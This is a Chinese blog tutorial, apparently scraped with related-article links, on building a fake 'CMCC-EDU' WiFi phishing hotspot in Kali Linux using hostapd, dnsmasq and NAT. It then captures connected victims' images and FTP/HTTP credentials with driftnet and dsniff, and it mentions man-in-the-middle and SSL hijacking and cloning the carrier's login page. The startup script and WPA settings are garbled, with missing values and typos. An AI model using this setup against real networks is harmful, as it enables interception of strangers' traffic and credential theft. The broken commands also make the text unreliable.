kali下搭建WiFi钓鱼热点
在linux下建立无线热点并不像在windows下开启网络共享或者使用无线网卡驱动设置AP模式即可。
linux下的无线共享要用到两个软件:hostapd(创建无线热点)、dnsmasq(dns服务和dhcp服务).
1.安装以上两个软件:
apt-get install hostapd
apt-get install dnsmasq
2.配置hostapd.conf文件
很多教程上说配置/etc/hostapd/hostapd.conf文件,但是初次配置时,在/etc/hostapd/下并没有发现这个文件。
好吧,用linux的强大查找功能吧:
# find -name hostapd
靠,没有。这个可以有!赶紧google一下,在网上可以直接找到hostapd.conf文件,如果直接copy下来放到/etc/hostapd/来可能版本不同不兼容。
想了想,应该在/etc/(毕竟是个配置文件),在到/etc/下找找吧:
/etc# find -name hostapd
发现以下文件:
./default/hostapd
./init.d/hostapd
./hostapd
./network/if-post-down.d/hostapd
./network/if-pre-up.d/hostapd
进去看看:

在该文件中发现了hpstapd.conf.gz文件,它 的位置是/usr/share/doc/hostapd/examples/
好吧,应该找到了,只是压缩了,解压吧。注意还要修改上图的文件,将#DAEMON_CONF=“”修改成上图形式的(我的已经修改好了)。
DAEMON_CONF=/etc/hostapd/hostapd.conf
保存并退出,将 hpstapd.conf.gz复制到/etc/hostapd/下:
# cp /usr/share/doc/hostapd/examples/hostapd.conf.gz /etc/hostapd/
进入/etc/hostapd/目录下,解压:
/etc/hostapd# gzip -d hostapd.conf.gz > hostapd.conf
现在可以编辑hostapd.conf文件了:
# cd /etc/hostapd
/etc/hostapd# vim ./hostapd.conf
去掉前面的注释(去‘#’),并修改以下的:
interface=wlan2 //设置要做为AP的网卡
driver=nl80211 //设置无线网卡驱动,一般都是这样(也可以具体的,如rtl871xdrv)
ssid=CMCC-EDU //设置热点的名称,CMCC-EDU你总该连吧~
hw_mode=g //(默认)无线模式,这里是默认的
channel=6 //无线频道(1、6、11三个频道互补干扰)
macaddr_acl=0 //(默认)MAC地址过滤规则,设置为0即有规则的话就启用
auth_algs=1 //设置为开放无线模式
其他的默认就好,当然你也可以仔细研究这个hostapd.conf文件(如果你的E文好的话...),最后会说说支持WPA加密的设置。
接下来,是配置dnsmasq.conf文件:
vim /etc/dnsmasq.conf
修改为如下图形式:

设置内核支持IP转发,编辑/etc/sysctl.conf文件,去掉“# net.ipv4.ip_forward=1”前面的#去掉:

现在就可以启动我们设置好的伪造热点了,这里直接写成了一个脚本:
#! /bin/bash case $ in
"start")
sleep
ifconfig wlan2 192.168.10.1 netmask 255.255.255.0 //无线热点的接口wlan2
sleep
echo "" >/proc/sys/net/ipv4/ip_forward
sleep
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE //这里我上网的网卡是wlan0,如果是网线的话就是eth0
sleep
/etc/init.d/hostapd start
sleep
/etc/init.d/dnsmasq start
;;
"stop")
/etc/init.d/dnsmasq stop
/etc/init.d/hostapd stop
sleep
iptables -t nat -D POSTROUTING -o wlan0 -j MASQUERADE //同上
sleep
echo "" >/proc/sys/net/ipv4/ip_forward
sleep
;;
*)
echo "Usage $0 {start|stop}"
;;
esac
取个名字AP-wlan0,再给它加个可运行权限,并放到/etc/init.d/下:
chmod +x ./AP-wlan0
cp ./AP-wlan0 /etc/init.d
启动服务脚本:
service AP-wlan0 start
启动之后,如图():

好了,手机连接上试试~~

由于我这有CMCC-EDU的无线信号,为了便于区分,我把伪造的热点改为CMCC-EDUU,
用driftnet抓去网页图片看看:
driftnet -i wlan2


效果很明显哦^_^,driftnet还可以捕获音频的哦,详细去看说明吧
当然,这个时候打开dsniff和wireshark的话,所有的数据都可以抓下来了,中间人攻击、ssl等各种劫持都可以哦,这个我也在研究。。。
dsniff指定端口嗅探:
dsniff -i wlan2 -t 21/tcp=ftp,80/tcp=http
由于我这里在克隆CMCC-EDU登录界面时,它做的有点变态,还得修改点,所以暂时先写到这了
PS:下一步就该轮到我的树莓派上场了,亲看下回分解`_`
补充的:
配置hostapd.conf文件支持WPA加密:
interface=wlan2
driver=nl80211
ssid=mywifi
hw_mode=g
channel=
macaddr_acl=
auth_algs=
ignore_broadcast_ssid=
ieee80211n=
wpa=2 //WPA2加密模式
wpa_passphrase=mimanicai //密码(即wifi密码)
wpa_key_mgmt=WPA-PSK
wpa-pairwise=TKIP
rns-pairwise=CCMP //其他的默认,kali默认用vim时是没有高亮显示的,建议设置成高亮的以便于查找,怎么设,自己google吧
kali下搭建WiFi钓鱼热点的更多相关文章
- 如何在Kali Linux中搭建钓鱼热点
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! 0×00 实验环境 操作系统:Kali 1.0 (VM) FackAP: easy-creds 硬件:NETGEAR wg ...
- 电子证据 利用Kali进行wifi钓鱼实战详细教程
电子证据 利用Kali进行wifi钓鱼实战详细教程 一. Kali系统安装和必要软件安装: 1.Kali最新版可以来我这儿拿外置驱动和光盘装,目测用U盘装最新版有些问题,比较麻烦. 2.Kali更新源 ...
- 利用Kali进行WiFi钓鱼测试实战
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用.请不要做一只咖啡馆里安静的猥琐大叔. 写在前面 从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点.然而由于网上的 ...
- Kali Linux下破解WIFI密码挂载usb无线网卡的方法
Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12 来源:服务器之家 投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还 ...
- Linux:Ubuntu16.04下创建Wifi热点
Linux:Ubuntu16.04下创建Wifi热点 说明: 1.Ubuntu16.04里面可以直接创建热点,而不用像以前的版本,还要其他辅助工具. 2.本篇文章转载自编程人生 具体步骤如下: 1. ...
- kali linux 2.0下搭建DVWA渗透测试演练平台
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+MySQL编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序.包含了SQL注入.XSS.盲注等常 ...
- kali 2.0下搭建DVWA环境
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序.包含了SQL注入.XSS.盲注等常 ...
- Linux:Ubuntu16.04下创建Wifi热点
Linux:Ubuntu16.04下创建Wifi热点说明 1.Ubuntu16.04里面可以直接创建热点,而不用像以前的版本,还要其他辅助工具. 2.本篇文章参考自编程人生 具体步骤如下: 1. 点击 ...
- Win7下设置WiFi热点
Win7下设置WiFi热点 今天研究了下Win7设置WIFI热点,Connectify神马的都是浮云~亲測可用,现拿出来分享下~ 1.点击"開始",再点击"执行" ...
随机推荐
- Django Admin定制
Django内置的Admin是对于model中对应的数据表进行增删改查提供的组件,使用方式有: 依赖APP: django.contrib.auth django.contrib.contenttyp ...
- SIM800/SIM900/SIM7000/SIM7600底层操作接口_句柄方式完全分离通信底层
使用SIMCOM公司通信模块将底层的通信与应用完全进行了分离,便于移植. SIMCOM.h //定义了相关的结构体与类型. SIMCOM_AT.c//定义了底层的AT接口 SIMCOM_GSM.c// ...
- POJ 2395 Out of Hay(求最小生成树的最长边+kruskal)
Out of Hay Time Limit: 1000MS Memory Limit: 65536K Total Submissions: 18472 Accepted: 7318 Descr ...
- 【DataGuard】部署Data Guard相关参数详解 (转载)
原文地址:[DataGuard]部署Data Guard相关参数详解 作者:secooler 有关物理Data Guard部署参考<[DataGuard]同一台主机实现物理Data Gua ...
- 操作表单域中的value值
HTML <form action=""> <input type="radio" name="sex" value=&q ...
- findbug、p3c、checkstyle、sonar安装使用
idea插件安装方式: Preferences—>Plugins—>查找插件—>Install Preferences—>Plugins—>Install plug fr ...
- selenium+python自动化79-文件下载(SendKeys)
前言 文件下载时候会弹出一个下载选项框,这个弹框是定位不到的,有些元素注定定位不到也没关系,就当没有鼠标,我们可以通过键盘的快捷键完成操作. SendKeys库是专业的处理键盘事件的,所以这里需要用S ...
- 【转】iOS9适配 之 关于info.plist 第三方登录 添加URL Schemes白名单
近期苹果公司iOS 9系统策略更新,限制了http协议的访问,此外应用需要在“Info.plist”中将要使用的URL Schemes列为白名单,才可正常检查其他应用是否安装. 受此影响,当你的应用在 ...
- Wasserstein距离 和 Lipschitz连续
EMD(earth mover distance)距离: 在计算机科学与技术中,地球移动距离(EMD)是一种在D区域两个概率分布距离的度量,就是被熟知的Wasserstein度量标准.不正式的说,如果 ...
- hadoop之HDFS学习笔记(一)
主要内容:hdfs的整体运行机制,DATANODE存储文件块的观察,hdfs集群的搭建与配置,hdfs命令行客户端常见命令:业务系统中日志生成机制,HDFS的java客户端api基本使用. 1.什么是 ...